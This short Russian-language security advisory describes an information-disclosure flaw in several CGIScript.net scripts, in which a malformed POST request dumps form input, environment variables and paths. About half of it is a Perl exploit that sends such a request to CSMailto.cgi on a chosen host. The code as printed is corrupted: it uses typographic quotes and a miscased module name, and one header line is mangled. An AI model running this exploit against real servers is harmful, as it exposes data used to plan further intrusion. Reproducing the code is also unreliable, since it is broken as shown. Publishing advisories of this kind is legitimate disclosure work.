CGIScript.net выпускает множество CGI сценариев, облегчающих создание Web сайта. 

При представлении некорректного POST запроса, многие сценарии раскроют чувствительную информацию, типа ввода формы, переменных среды, пути. Полученная информация может использоваться в дальнейших нападениях против уязвимой системы. Эксплоит: 

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data
use strict;
use IO::Socket::Inet;
my $host = ‘hostname.com’;
my $path = ‘/cgi-script/CSMailto/CSMailto.cgi’;
my $sock = IO::Socket::INET->new(«$host:80»);
print $sock «POST $path\n»;
print $sock «Content-type: multipart/form-data;»;
print $sock » boundary=—\n\n»;
print <$sock>;
close($sock);

Уязвимость обнаружена в CGIScript.net csBanner, csCreatePro, csDownload, csFAQ, csFiler, csFileshare, csGrid, csIncludes, csMailto, csNews, csRandomText, csUpload 1.0.

Оставить мнение